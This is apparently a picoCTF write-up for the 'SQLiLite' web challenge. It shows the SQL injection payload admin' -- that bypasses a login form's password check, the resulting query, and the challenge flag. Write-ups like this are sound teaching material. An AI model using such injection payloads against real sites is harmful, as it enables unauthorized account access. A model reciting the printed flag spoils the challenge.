# **SQLiLite**

# Web Exploitation

### **Description:**

Can you login to this website?

Additional details will be available after launching your challenge instance.

Can you login to this website? Try to login here.

#### Hints:

1) admin is the user you want to login as.

#### Solution:

```
username: admin' --
password: 1234

SQL query: SELECT * FROM users WHERE name='admin' -- ' AND password='1234'
```

### Logged in! But can you see the flag, it is in plainsight.

- 1) We use simple sql injection to log in to this website.
- 2) We put in admin' -- as the username and put anything as the password to enter.

```
#039; AND password='1234'
ht.</h1>Your flag is: picoCTF{L00k5_l1k3_y0u_solv3d_it_ec8a64c7}
```

3) We find the flag in the source files.

Flag: picoCTF{L00k5\_l1k3\_y0u\_solv3d\_it\_ec8a64c7}